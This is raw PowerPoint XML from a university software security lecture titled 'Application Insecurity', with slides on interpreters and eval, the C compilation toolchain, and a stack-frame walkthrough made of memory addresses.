      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2988045441"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484548" r:id="rId1"/>
    <p:sldLayoutId id="2147484549" r:id="rId2"/>
    <p:sldLayoutId id="2147484550" r:id="rId3"/>
    <p:sldLayoutId id="2147484551" r:id="rId4"/>
    <p:sldLayoutId id="2147484552" r:id="rId5"/>
    <p:sldLayoutId id="2147484553" r:id="rId6"/>
    <p:sldLayoutId id="2147484554" r:id="rId7"/>
    <p:sldLayoutId id="2147484555" r:id="rId8"/>
    <p:sldLayoutId id="2147484556" r:id="rId9"/>
    <p:sldLayoutId id="2147484557" r:id="rId10"/>
    <p:sldLayoutId id="2147484558" r:id="rId11"/>
    <p:sldLayoutId id="2147484559" r:id="rId12"/>
    <p:sldLayoutId id="2147484560" r:id="rId13"/>
    <p:sldLayoutId id="2147484561" r:id="rId1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4.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6.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.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6.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30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6.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Application Insecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886199"/>
            <a:ext cx="6400800" cy="2059281"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>CSE 545 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Software Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Spring 2018</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adam Doupé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0"/>
              <a:t>Arizona State University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adamdoupe.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6581001"/>
            <a:ext cx="5334000" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Content of some slides provided by Giovanni Vigna of UCSB, with approval</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="813896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Interpretation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program is passed to an interpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program might be translated into an intermediate representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python byte-code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each instruction is parsed and executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In most interpreted languages it is possible to generate and execute code dynamically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bash: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&lt;string&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&lt;string&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124589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100</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0xfd2c0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0x80483a5</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562084" y="305096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6" name="Right Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="261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68715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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a: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101</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0xfd2c0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0x80483a5</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562084" y="305096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58584105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102</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0xfd2c0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0x80483a5</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567044" y="331614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802266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103</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0xfd2c0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0x80483a6</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567044" y="331614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1168600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104</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0x80483a6</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567044" y="331614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20601217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105</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0x80483a8</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4566374" y="359046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70291903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106</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0x80483a8</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4566374" y="359046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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65264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107</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0x80483ab</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="387006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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181366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0x28</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>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108</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0x80483ab</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="387006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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87399619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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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109</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0x80483b3</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="4155312"/>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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="465903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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The preprocessor expands the code to include definitions, expand macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The C preprocessor is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>cpp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The compiler turns the code into architecture-specific assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The C compiler is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prog.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will generate the assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>option to generate 32-bit assembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17915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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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110</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0x80483b3</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="4155312"/>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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72121823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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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111</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0x80483ba</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4538942" y="4429632"/>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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111713836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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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112</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0xfd2b4</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0x80483ba</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4538942" y="4429632"/>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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="320931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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29494122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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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113</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0xfd2b4</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0x8048394</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4538942" y="4429632"/>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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="320931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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68482726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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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114</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0xfd2b4</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0x8048394</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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="320931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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="61666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52696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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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115</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0xfd2b0</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0x8048394</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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="320931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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="61666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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121697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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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116</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0xfd2b0</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0x8048394</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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="61666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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99356139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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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117</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0xfd2b0</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0x8048394</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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="61666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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210104395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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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118</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0xfd2b0</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0x8048395</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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="87269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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117212725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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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119</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0xfd2b0</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0x8048395</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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="87269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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107531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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The assembler turns the assembly into a binary object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The assembler is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A binary object contains the binary code and additional metadata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocation information about things that need to be fixed once the code and the data are loaded into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information about the symbols defined by the object file and the symbols that are imported from different objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debugging information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108733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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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120</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0xfd2b0</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0x8048397</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="115615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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173537417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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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121</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0xfd2b0</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0x8048397</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="306534"/>
            <a:ext cx="1374741" cy="1851450"/>
            <a:chOff x="5050323" y="118804"/>
            <a:chExt cx="1374741" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Right Bracket 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5206736" y="118804"/>
              <a:ext cx="763571" cy="5909348"/>
            </a:xfrm>
            <a:prstGeom prst="rightBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:headEnd type="none"/>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w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
